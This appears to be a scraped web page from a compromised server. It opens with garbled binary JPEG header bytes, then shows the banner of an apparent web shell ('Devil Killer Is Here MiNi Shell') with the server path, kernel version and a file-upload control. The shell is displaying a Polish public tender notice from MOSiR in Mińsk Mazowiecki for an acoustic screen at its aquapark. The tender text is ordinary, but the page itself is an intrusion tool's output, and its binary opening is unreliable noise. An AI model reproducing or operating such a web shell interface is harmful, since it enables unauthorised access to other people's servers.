JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230904/0037995001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ekranu akustycznego na elewacji szczytowej od strony ul. Zachodniej obiektu AQUAPARK z LODOWISKIEM MOSiR w Mińsku Maz. sp. z o.o. przy ul. Kard. S. Wyszyńskiego 56 ZAPROJEKTUJ I WYBUDUJ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Sportu i Rekreacji w Mińsku Mazowieckim Spółka z ograniczoną odpowiedzialnością</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 386353280</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stefana Kardynała Wyszyńskiego 56</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mińsk Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 25 752 24 46</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 25 752 24 46</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mosir@mosir.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://mosir.org.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sport, rekreacja, turystyka </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ekranu akustycznego na elewacji szczytowej od strony ul. Zachodniej obiektu AQUAPARK z LODOWISKIEM MOSiR w Mińsku Maz. sp. z o.o. przy ul. Kard. S. Wyszyńskiego 56 ZAPROJEKTUJ I WYBUDUJ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7ed88969-47ca-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00379950</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7ed88969-47ca-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>4. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia): https://ezamowienia.gov.pl/mpclient/tenders/ocds-148610-7ed88969-47ca-11ee-9aa3-96d3b4440790. Pod wyżej wskazanym adresem udostępniane będą również zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">14. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie<br/>wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na<br/>Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania<br/>pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>15. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po<br/>zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>16. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi<br/>150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>17. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług<br/>Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin<br/>Platformy e-Zamówienia.<br/>18. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-<br/>Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem<br/>telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie<br/>internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>że:<br/>1. administratorem Pani/Pana danych osobowych jest Miejski Ośrodek Sportu i Rekreacji w Mińsku<br/>Mazowieckim sp. z o.o. z siedzibą przy ul. Stefana Kardynała Wyszyńskiego 56 w Mińsku<br/>Mazowieckim (05-300);<br/>2. dane kontaktowe inspektora ochrony danych, e-mail: iod@mosir.org.pl;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego na Budowa ekranu<br/>akustycznego na elewacji szczytowej od strony ul. Zachodniej obiektu AQUAPARK z<br/>LODOWISKIEM MOSiR w Mińsku Maz. sp. z o.o. przy ul. Kard. S. Wyszyńskiego 56 ZAPROJEKTUJ I<br/>WYBUDUJ, nr D.251.05.2023 prowadzonego w trybie podstawowym bez negocjacji oraz w związku<br/>z realizacją tego zadania;<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 z późn. zm.), dalej „ustawa PZP”</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D.251.05.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa ekranu akustycznego na elewacji szczytowej od strony<br/>ul. Zachodniej obiektu AQUAPARK z LODOWISKIEM Miejskiego Ośrodka Sportu i Rekreacji w<br/>Mińsku Mazowieckim sp. z o.o. przy ul. Kardynała Stefana Wyszyńskiego 56 w systemie<br/>ZAPROJEKTUJ I WYBUDUJ tj.:<br/>a) wykonanie dokumentacji projektowej (przez projektanta/zespół projektantów)<br/>• Projekt zagospodarowania terenu<br/>• Projekt architektoniczno-budowlany<br/>• Projekt techniczny-wykonawczy<br/>• Przedmiar robót<br/>• Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych<br/>b) oraz na jej podstawie wykonanie robót budowlanych (pod nadzorem kierownika budowy)<br/>polegających na montażu ekranu akustycznego. Szczegółowy opis i zakres obowiązków<br/>zawiera opis przedmiotu zamówienia zawarty w Załączniku nr 9 (wzór umowy) i Załączniku<br/>nr 2 (Program Funkcjonalno-Użytkowy) niniejszej specyfikacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44212329-1 - Ekrany ochronne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71313000-5 - Usługi doradcze w zakresie środowiska naturalnego</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">44112600-4 - Izolacja dźwiękoszczelna</p> <p class="mb-0">45262210-6 - Fundamentowanie</p> <p class="mb-0">45233292-2 - Instalowanie urządzeń ochronnych</p> <p class="mb-0">45323000-7 - Roboty w zakresie izolacji dźwiękoszczelnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert <br/>	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami i wagami:<br/>	CENA BRUTTO – waga (znaczenie) 60 %, maksymalnie 60 punktów<br/>	OKRES GWARANCJI – waga (znaczenie) 40%, maksymalnie 40 punktów<br/>sposób oceny: ocena indywidualna.<br/>Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione wyżej kryteria.<br/><br/>KRYTERIUM 1 CENA BRUTTO:<br/>Oferta zawierająca najniższą cenę brutto otrzyma maksymalną ilość punktów (60 pkt.).<br/>Pozostałym ofertom, wypełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza (odpowiednio i proporcjonalnie mniejsza) ilość punktów, wg. wzoru poniżej:<br/>Po_(badanej_CENA)=(Co_min)/(Co_badanej ) ×60[pkt]<br/>KRYTERIUM 2 OKRES GWARANCJI:<br/>Zamawiający informuje, że okres gwarancji jest równy okresowi rękojmi.<br/>Minimalny okres gwarancji i rękojmi wynosi 36 miesięcy, a maksymalny 60 miesięcy.<br/>Wykonawca, który zaoferuje najkrótszy możliwy okres gwarancji i rękojmi (36 miesięcy) otrzyma 0 pkt.<br/>Wykonawca, który zaoferuje najdłuższy możliwy okres gwarancji i rękojmi (60 miesięcy) otrzyma 40 pkt. Jeżeli wykonawca zaproponuje okres gwarancji i rękojmi dłuższy niż 60 miesięcy do oceny ofert zostanie przyjęty okres 60 miesięcy.<br/>Oferta wykonawcy, który zaoferuje okres gwarancji i rękojmi krótszy niż 36 miesięcy może zostać odrzucona w myśl art. 226 ust. 1 pkt 5 ustawy PZP po potwierdzeniu, co do niezgodności treści oferty z treścią SWZ.<br/>Pozostałym ofertom, wypełniającym wymagania kryterialne przypisana zostanie ilość punktów, wg. wzoru poniżej:<br/>Po_(badanej_GWARA)=(Go_badanej-36)/60×2,5 ×40[pkt]<br/><br/>WZÓR NA SUMARYCZNĄ LICZBĘ PUNKTÓW OFERTY:<br/>Po_badanej=(Co_min)/(Co_badanej )×60[pkt]+ (Go_badanej-36)/60×2,5 ×40[pkt]<br/><br/>gdzie:<br/>Pobadanej – liczba punktów, jakie otrzyma badana oferta – sumaryczna,<br/>Pobadanej_CENA	– liczba punktów, jakie otrzyma badana oferta – kryterium cena,<br/>Pobadanej_GWARA	– liczba punktów, jakie otrzyma badana oferta – kryterium okres gwarancji,<br/>Comin – najniższa cena ze wszystkich ofert niepodlegających odrzuceniu,<br/>Cobadanej –	cena oferty badanej,<br/>Gobadanej	–	okres gwarancji oferty badanej.<br/>Maksymalna łączna liczba punktów, jaką może uzyskać Wykonawca wynosi – 100 pkt.<br/><br/>	Punkty będą liczone z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadą zaokrąglania:<br/>	trzecia cyfra po przecinku mniejsza niż 5 – ona oraz cyfry na prawo od niej zostaną wyzerowane<br/>	trzecia cyfra po przecinku równa lub większa niż 5 – ona oraz cyfry na prawo od niej zostaną wyzerowane a do cyfr po przecinku zostanie dodane 1)<br/>	Zamawiający wybierze najkorzystniejszą ofertę Wykonawcy, która odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie PZP oraz w Specyfikacji Warunków Zamówienia i zostanie oceniona, jako najkorzystniejsza (z największą liczbą punktów) w oparciu o podane kryteria.<br/>	Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.<br/>	Zamawiający nie przewiduje przeprowadzenia dogrywki w formie aukcji elektronicznej.<br/>	Wszelkie niejasności i obiekcje dotyczące treści zapisów w SWZ należy wyjaśnić z Zamawiającym przed terminem składania ofert.<br/>Zamawiający poprawi oczywiste omyłki rachunkowe w sposób określony w art. 223 ust. 2 pkt 2 ustawy PZP.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> IX. Warunki udziału w postępowaniu<br/>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a) nie podlegają wykluczeniu na zasadach określonych w pkt X SWZ,<br/>b) spełniają warunki udziału w postępowaniu na zasadach określonych w pkt IX SWZ.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedłoży:<br/>a) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na<br/>sumę gwarancyjną nie mniejszą niż 250 000 PLN np. aktualną opłaconą polisę. Ocena<br/>warunku: spełnia/nie spełnia.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże że:<br/>a) dysponuje lub będzie dysponował w okresie wykonywania zamówienia osobami skierowanymi<br/>do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług,<br/>kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami.<br/>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje minimum:<br/>a1) 1 osobą odpowiedzialną za wykonanie i autorstwo dokumentacji projektowej,<br/>posiadającą uprawnienia budowlane do sporządzania projektów architektonicznobudowlanych<br/>i technicznych lub odpowiadające tym specjalnościom inne ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów, a które uprawniają do pełnienia tych funkcji w odpowiednim zakresie,<br/>będącą członkiem regionalnej Okręgowej Izby Inżynierów Budownictwa/Architektów<br/>lub posiadającą zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w<br/>ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2023 poz. 334 z poźn.<br/>zm.), która posiada minimum 5 lat doświadczenia zawodowego w zakresie<br/>projektowania ekranów akustycznych;<br/>a2) 1 osobą odpowiedzialną za kierowanie robotami budowlanymi, posiadającą<br/>uprawnienia budowlane do sprawowania samodzielnych funkcji w specjalności<br/>konstrukcyjno-budowlanej bez ograniczeń, lub odpowiadające tym specjalnościom inne<br/>ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w odpowiednim<br/>zakresie, będącą członkiem regionalnej Okręgowej Izby Inżynierów Budownictwa lub<br/>posiadającą zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w<br/>ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2023 poz. 334 z poźn.<br/>zm.), która posiada minimum 5 lat doświadczenia zawodowego w kierowaniu robotami<br/>budowlanymi w zakresie budowy ekranów akustycznych;<br/>a3) 2 osobami – pracownicy fizyczni z co najmniej 2 letnim doświadczeniem montażowym<br/>w branży konstrukcyjno-budowlanej.<br/>Ocena warunku: spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">OFERTA:<br/>3. Aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia którego wzór stanowi Załącznik nr 4 do SWZ. Informacje zawarte w oświadczeniu, stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu;.<br/>NA WEZWANIE:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – wzór oświadczenia stanowi załącznik nr 6 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5) Oświadczenie o aktualności informacji (Wzór oświadczenia stanowi załącznik nr 10 do 